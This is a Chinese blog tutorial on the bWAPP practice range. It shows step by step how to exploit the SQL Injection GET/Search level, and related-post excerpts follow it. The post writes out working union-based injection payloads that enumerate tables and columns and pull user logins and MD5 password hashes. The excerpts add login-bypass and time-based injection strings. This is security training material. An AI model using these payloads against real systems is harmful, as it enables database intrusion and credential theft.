bWAPP靶场 injection SQL Injection GET/Search

已于 2023-04-23 21:09:06 修改
阅读量259 收藏 4
点赞数 3
分类专栏: web sql bWAPP 文章标签: sql 数据库 mysql
于 2023-04-23 21:02:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77205899/article/details/130330329
版权
web 同时被 3 个专栏收录
1 篇文章 0 订阅
订阅专栏
sql
1 篇文章 0 订阅
订阅专栏
bWAPP
1 篇文章 0 订阅
订阅专栏

SQL

简单的sql注入:

示例:靶场 bWAPP练习 injection SQL Injection GET/Search

1.进入靶场环境 难度等级:low

 

 

2.测试分析,在搜索栏中随意输入字母,示例:

页面出现电影名称以及其他数据

3.测试漏洞

常用方法:

'(英文单引号)报错测试

and和or测试法

这里我们输入:

a'

页面报错:说明存在注入点

4.爆字段(数据表的列数)

order by 语句   #二分查找法

输入:

a’ order by 10#    //a可以为任意  10同理

页面出现报错 说明列数少于10列

说明列数大于5列 ,以此类推当我们在7到8之间时发现页面回显不一样 说明该表格只有7列

5.爆表(即获取当前数据表)

方法:union select联合注入

输入:

a' union select 1,2,3,4,5,6,7#

1到7为我们查出来的表中的所有列

我们可以把一些内置函数替换这几个数字,会得出我们想要的东西。

例如

查看当前数据库名 输入:

a'union select 1,database(),3,4,5,6,7#

用 database() 替换了 2 原来数据 2 就会变成我们查找的数据库名字

内置函数:

system_user()         系统用户名
user()                用户名
current_user          当前用户名
session_user()        连接数据库的用户名
database()            数据库名
version()             MYSQL数据库版本
load_file()           MYSQL读取本地文件的函数
@@datadir             读取数据库路径
@@basedir             MYSQL 安装路径
@@version_compile_os  操作系统

开始暴数据表 输入:

a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

information_schema.tables 提供了关于数据库中的表的信息

table_schema 是数据库的名称

可以看到,爆出了5个表,其中users表是一个比较重要的表

6.获取后台账户和密码

先查看users表中的列的信息 输入:

a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#c

column_name(s) 数据库表中所有列的名称,column_name是一个列名称

information_schema.columns提供了关于表中的列的信息

其中 login 和 password 应该为账号和密码 查出该信息

输入:

a' union select 1,login,password,4,5,6,7 from users#

得到 账号 密码(经过md5加密)

md5在线加密解密 加解密网站

最终得到 账号 密码

新手入门web SQL

bWAPP练习--injection篇SQL Injection (GET/Search) 参考大佬文献

盼一_
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2688
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
学习web 安全笔记(第十二天)-作业,bwapp的post的sql注入
04-10 683
movie=1 union select 1,2,3,4,5,6,7 -- &action=go 获得正常返回查询。movie=1' union select 1 -- &action=go 报语法错误。movie=1 union select 1 -- &action=go 报参数数量不对。修改movie=1&action=go 为movie=1'&action=go。尝试选择11,即选择一个没有的值,确保union后的select结果能够出来。运行效果,在下拉框里选择内容,然后点击查询。
学习web 安全笔记(第十三天)-作业,bwapp的sql注入判断
最新发布
04-17 210
如果页面返回错误,说明这个单引号被带到了数据库sql语句里去执行。因此可以判断有sql注入。字符串类型后面加 ' and '1'='1' , ' and '1'='2'然后输入 i ' and '1'='1 反馈no movies。注意:要推测后端sql语句的写法,尝试构造sql语句去闭合。可以降低攻击成功率,增加攻击成本。然后输入i',返回报错。可以后面加 and 1=1 ,and 1=2。查看bwapp环境源代码。
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 776
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
bwapp靶场笔记 -SQL注入篇
m0_52149675的博客
10-30 1504
​启动靶场
【bwapp】SQL Injection(GET/Search)——low级别
用博客做做记录的小白
06-13 523
bwapp靶场sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入。
3.bWAPP SQL注入篇
众生度尽,方证菩提
01-23 2672
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
SQL Injection (GET/Search)
qq_40554015的博客
09-17 697
SQL Injection (GET/Search) 1.判断注入点 输入' 提示: near '%'' at line 1 1111' or 1=1 # 无异常 2.判断字段数 ' order by 10 # ' order by 7 # 7个字段 3.判断可显示字段: -1' union select 1,2,3,4,5,6,7 # 2,3,4,5 为可显示字段 4.爆库: -1' union select 1,datab...
bWAPP练习--injectionSQL Injection (GET/Search)
weixin_38167363的博客
04-09 986
SQL注入: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
bWAPP SQL注入篇
angry_program的博客
03-03 6644
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
sql和xss等靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
sql注入#sql靶场
11-02
sql注入#sql靶场
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
Bwapp学习笔记
qq_48257021的博客
12-21 1254
网站内部直接发送的SQL请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句,如果用户输入的数据被构造成恶意SQL代码,Web应用又未对动态构造的SQL语句使用的参数进行审查,则会带来意想不到的危险。
学习web 安全笔记(第十一天)-作业,bwapp的sql注入
04-03 188
注意h后面有一个单引号,使用union联合,最后用--后面要有一个空格跟后面的隔开。看有没有sql注入漏洞,输入h',发现加了单引号后,有返回报错信息。然后开始通过union修改该语句,确认select返回的实际字段。由于密码比较简单,所以解密网站通过彩虹表爆破的方式解开了密码。用A.I.M.账号,密码bug。通过显示,可以看到,2/3/5、4列是可以显示出来的。环境:使用已经搭建好的docker里的bwapp。通过不断增加select的列。根据列信息去进一步获得表的内容信息。获得账号和密码信息。
bWAPP中SQL注入思路
qq_37019068的博客
10-09 1237
bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bWAPP----SQL Injection (GET/Search)
weixin_30477293的博客
07-23 563
SQL Injection (GET/Search) 输入单引号 报错,在%'附近出错,猜测参数被 '% %'这种形式包裹,没有任何过滤,直接带入了数据库查询 输入order by查询列 union select 确定显示位 然后分别查询用户,数据库名,数据库版本 根据数据库版本知道可以通过information_schema表查询信息,查询table...
win10 bwapp靶场搭建
07-25
8. 完成安装后,访问"http://localhost/bwapp/"即可开始使用bwapp靶场。 请注意,为了安全起见,建议在搭建bwapp靶场时使用虚拟机或隔离环境。另外,确保将XAMPP和bwapp更新到最新版本以获取最新的安全修复和功能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

盼一_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值